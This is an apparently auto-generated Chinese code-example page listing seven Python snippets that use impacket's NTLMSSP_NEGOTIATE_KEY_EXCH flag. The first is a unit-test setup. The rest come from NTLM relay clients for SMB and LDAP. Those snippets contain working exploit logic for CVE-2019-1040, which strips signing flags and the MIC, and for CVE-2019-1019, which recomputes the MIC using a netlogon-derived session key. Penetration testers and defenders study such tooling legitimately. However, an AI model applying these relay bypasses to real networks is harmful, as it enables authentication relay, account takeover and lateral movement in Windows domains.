本文整理匯總了Python中impacket.ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的典型用法代碼示例。如果您正苦於以下問題:Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的具體用法?Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH怎麽用?Python ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH使用的例子?那麽, 這裏精選的屬性代碼示例或許可以為您提供幫助。您也可以進一步了解該屬性所在類impacket.ntlm的用法示例。
在下文中一共展示了ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH屬性的7個代碼示例,這些例子默認根據受歡迎程度排序。您可以為喜歡或者感覺有用的代碼點讚,您的評價將有助於係統推薦出更棒的Python代碼示例。
示例1: setUp
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def setUp(self):
# Turn test case mode on
ntlm.TEST_CASE = True
self.user = "User"
self.domain = "Domain"
self.password = "Password"
self.serverName = "Server"
self.workstationName = "COMPUTER"
self.randomSessionKey = b("U"*16)
self.time = b('\x00'*8)
self.clientChallenge = b("\xaa"*8)
self.serverChallenge = b("\x01\x23\x45\x67\x89\xab\xcd\xef")
self.flags = ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH | ntlm.NTLMSSP_NEGOTIATE_56 | ntlm.NTLMSSP_NEGOTIATE_128 | ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_ALWAYS_SIGN | ntlm.NTLMSSP_NEGOTIATE_NTLM | ntlm.NTLMSSP_NEGOTIATE_SEAL | ntlm.NTLMSSP_NEGOTIATE_SIGN | ntlm.NTLM_NEGOTIATE_OEM | ntlm.NTLMSSP_NEGOTIATE_UNICODE
self.seqNum = 0
self.nonce = b('\x00'*16)
self.plaintext = 'Plaintext'.encode('utf-16le')
print("## BEFORE RUNNING THESE TESTS")
print("Don't forget to set up aTime = '\\x00'*8 in computeResponseNTLMv2 otherwise the results won't be right. ")
print("Look for that in ntlm.py and uncomment the lines, comment the other ones and don't forget to revert everything back whenever finished testing")
print("Flags")
hexdump(struct.pack('<L',self.flags)) 示例2: sendNegotiate
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendNegotiate(self, negotiateMessage):
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
self.negotiateMessage = negotiateMessage
self.challengeMessage = challenge.getData()
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
self.serverChallenge = challenge['challenge']
return challenge 示例3: sendNegotiate
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendNegotiate(self, negotiateMessage):
negoMessage = NTLMAuthNegotiate()
negoMessage.fromString(negotiateMessage)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if negoMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
negoMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
negotiateMessage = negoMessage.getData()
challenge = NTLMAuthChallenge()
if self.session.getDialect() == SMB_DIALECT:
challenge.fromString(self.sendNegotiatev1(negotiateMessage))
else:
challenge.fromString(self.sendNegotiatev2(negotiateMessage))
# Store the Challenge in our session data dict. It will be used by the SMB Proxy
self.sessionData['CHALLENGE_MESSAGE'] = challenge
return challenge 示例4: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
return token, errorCode 示例5: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina and @YaronZi
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode 示例6: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
if unpack('B', authenticateMessageBlob[:1])[0] == SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
respToken2 = SPNEGO_NegTokenResp(authenticateMessageBlob)
token = respToken2['ResponseToken']
else:
token = authenticateMessageBlob
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(token)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
token = authMessage.getData()
with self.session.connection_lock:
self.authenticateMessageBlob = token
request = bind.bind_operation(self.session.version, 'SICILY_RESPONSE_NTLM', self, None)
response = self.session.post_send_single_response(self.session.send('bindRequest', request, None))
result = response[0]
self.session.sasl_in_progress = False
if result['result'] == RESULT_SUCCESS:
self.session.bound = True
self.session.refresh_server_info()
return None, STATUS_SUCCESS
else:
if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and self.PLUGIN_NAME != 'LDAPS':
raise LDAPRelayClientException('Server rejected authentication because LDAP signing is enabled. Try connecting with TLS enabled (specify target as ldaps://hostname )')
return None, STATUS_ACCESS_DENIED
#This is a fake function for ldap3 which wants an NTLM client with specific methods 示例7: sendAuth
# 需要導入模塊: from impacket import ntlm [as 別名]
# 或者: from impacket.ntlm import NTLMSSP_NEGOTIATE_KEY_EXCH [as 別名]
def sendAuth(self, authenticateMessageBlob, serverChallenge=None):
authMessage = NTLMAuthChallengeResponse()
authMessage.fromString(authenticateMessageBlob)
# When exploiting CVE-2019-1040, remove flags
if self.serverConfig.remove_mic:
if authMessage['flags'] & NTLMSSP_NEGOTIATE_SIGN == NTLMSSP_NEGOTIATE_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_ALWAYS_SIGN == NTLMSSP_NEGOTIATE_ALWAYS_SIGN:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_ALWAYS_SIGN
if authMessage['flags'] & NTLMSSP_NEGOTIATE_KEY_EXCH == NTLMSSP_NEGOTIATE_KEY_EXCH:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_KEY_EXCH
if authMessage['flags'] & NTLMSSP_NEGOTIATE_VERSION == NTLMSSP_NEGOTIATE_VERSION:
authMessage['flags'] ^= NTLMSSP_NEGOTIATE_VERSION
authMessage['MIC'] = b''
authMessage['MICLen'] = 0
authMessage['Version'] = b''
authMessage['VersionLen'] = 0
authenticateMessageBlob = authMessage.getData()
if unpack('B', authenticateMessageBlob[:1])[0] != SPNEGO_NegTokenResp.SPNEGO_NEG_TOKEN_RESP:
# We need to wrap the NTLMSSP into SPNEGO
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob
authData = respToken2.getData()
else:
authData = authenticateMessageBlob
signingKey = None
if self.serverConfig.remove_target:
# Trying to exploit CVE-2019-1019
# Discovery and Implementation by @simakov_marina
respToken2 = SPNEGO_NegTokenResp(authData)
authenticateMessageBlob = respToken2['ResponseToken']
errorCode, signingKey = self.netlogonSessionKey(authData)
# Recalculate MIC
res = NTLMAuthChallengeResponse()
res.fromString(authenticateMessageBlob)
newAuthBlob = authenticateMessageBlob[0:0x48] + b'\x00'*16 + authenticateMessageBlob[0x58:]
relay_MIC = hmac_md5(signingKey, self.negotiateMessage + self.challengeMessage + newAuthBlob)
respToken2 = SPNEGO_NegTokenResp()
respToken2['ResponseToken'] = authenticateMessageBlob[0:0x48] + relay_MIC + authenticateMessageBlob[0x58:]
authData = respToken2.getData()
if self.session.getDialect() == SMB_DIALECT:
token, errorCode = self.sendAuthv1(authData, serverChallenge)
else:
token, errorCode = self.sendAuthv2(authData, serverChallenge)
if signingKey:
logging.info("Enabling session signing")
self.session._SMBConnection.set_session_key(signingKey)
return token, errorCode